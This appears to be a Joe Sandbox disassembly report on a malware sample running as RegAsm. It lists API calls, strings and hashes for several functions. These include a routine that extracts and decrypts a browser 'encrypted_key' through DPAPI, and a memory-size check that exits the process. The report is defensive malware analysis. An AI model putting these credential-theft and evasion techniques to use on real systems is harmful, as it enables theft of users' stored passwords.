Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseCreateDefaultEventHandleName__aulldiv$CapsComputerCurrentDeviceGlobalInfoLangMemoryNumaOpenReleaseSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 655105637-0
Opcode ID: d8804ea1bff6748de93bb0085dad6dc73f5e155af435cafa9a0d600a9b6efe0f
Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
Opcode Fuzzy Hash: d8804ea1bff6748de93bb0085dad6dc73f5e155af435cafa9a0d600a9b6efe0f
Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Strings

<, xrefs: 004047C9

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
Opcode Fuzzy Hash: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413588

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

strtok_s.MSVCRT ref: 004136D1

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: d487b5a826abd393daba0d5abacc3e0c3b7c6db77f8dfe7a0cb344ed065f5bd8
Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
Opcode Fuzzy Hash: d487b5a826abd393daba0d5abacc3e0c3b7c6db77f8dfe7a0cb344ed065f5bd8
Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA

Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
LocalFree.KERNEL32(004102E7), ref: 00409A90
CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: c7567847eb904f88fd44aac24161c1541a4af156139b53349eb565b119f829a0
Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
Opcode Fuzzy Hash: c7567847eb904f88fd44aac24161c1541a4af156139b53349eb565b119f829a0
Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5

Function 00417690 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
HeapAlloc.KERNEL32(00000000), ref: 004176AB
RegOpenKeyExA.KERNEL32(80000002,0133C198,00000000,00020119,00000000), ref: 004176DD
RegQueryValueExA.KERNEL32(00000000,01342A08,00000000,00000000,?,000000FF), ref: 004176FE

Strings

Windows 11, xrefs: 004176BD

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55

Function 00417720 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
HeapAlloc.KERNEL32(00000000), ref: 0041773B
RegOpenKeyExA.KERNEL32(80000002,0133C198,00000000,00020119,004176B9), ref: 0041775B
RegQueryValueExA.KERNEL32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A

Strings

CurrentBuildNumber, xrefs: 00417771

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

Function 004140B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004140D5
RegOpenKeyExA.KERNEL32(80000001,01342300,00000000,00020119,?), ref: 004140F4
RegQueryValueExA.ADVAPI32(?,01342F30,00000000,00000000,00000000,000000FF), ref: 00414118
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
lstrcatA.KERNEL32(?,01342FC0), ref: 0041415B

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValuememset
String ID:
API String ID: 558315959-0
Opcode ID: c8ea4ff05fc360dd0eb8abd62819ebf399865877b8aaa9c3079995bd046e4cc4
Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
Opcode Fuzzy Hash: c8ea4ff05fc360dd0eb8abd62819ebf399865877b8aaa9c3079995bd046e4cc4
Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92

Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39

Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3

Strings

DPAPI, xrefs: 00409D89
, xrefs: 00409DC1
"encrypted_key":", xrefs: 00409D30

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: f17fdcf34bae0448dddec055fd2c15091bee7516281e57f26a3b262e227c4e54
Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
Opcode Fuzzy Hash: f17fdcf34bae0448dddec055fd2c15091bee7516281e57f26a3b262e227c4e54
Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5

Function 6C2BC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C2BC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C2BC969
GetSystemInfo.KERNEL32(?), ref: 6C2BC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C2BC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C2BC9E2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 39119f362e7cd88d5a56daa54a1e23ff46c4f4654310faecf9c85c7399496049
Instruction ID: 5279336c15d4eb2a2da03c648a20f83ff401e9bed4229f745691972cb3961efb
Opcode Fuzzy Hash: 39119f362e7cd88d5a56daa54a1e23ff46c4f4654310faecf9c85c7399496049
Instruction Fuzzy Hash: 3E21D73174161CABEF14EA24DC84BBE73BDAB4AB49F50052EFD43B7A40DB74680487A0

Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0133AD08), ref: 0041079A
StrCmpCA.SHLWAPI(00000000,0133AC48), ref: 00410866
StrCmpCA.SHLWAPI(00000000,0133ACC8), ref: 0041099D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

`_A, xrefs: 00410A40, 00410A54, 00410803, 0041091B, 00410806, 0041091E, 00410A43

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
